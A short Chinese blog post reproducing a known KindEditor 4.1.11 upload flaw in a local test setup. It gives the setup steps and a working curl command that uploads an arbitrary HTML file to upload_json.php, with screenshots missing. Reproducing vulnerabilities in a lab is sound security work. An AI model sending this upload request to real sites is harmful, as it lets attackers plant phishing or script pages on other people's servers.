KindEditor 上传漏洞复现

2019-03-04  本文已影响0人  0ne0ne

准备工作:

phpstudy,kindeditor 4.1.11官方下载:http://kindeditor.net/down.php
注:attached,为图片及文件上传存放的路径需要自己建立。
修改js名称,将kindeditor-all.js改成kindeditor.js

image.png
(默认的demo调用的js文件名称就是kindeditor.js,当然也可以修改demo中调用的名称)

测试demo

访问测试的地址,出现如下界面说明正常:


image.png

漏洞复现

准备一个html文件,内容随便写就好,比如 1.html
使用curl提交

curl -F "imgFile=@1.html" http://127.0.0.1/test/kindeditor/php/upload_json.php?dir=file

返回值


image.png

访问一下上图返回的地址


image.png

参考资料

https://github.com/kindsoft/kindeditor/issues/249

文章同时也会在我的博客 0ne0ne.com同步更新。

上一篇下一篇

猜你喜欢

热点阅读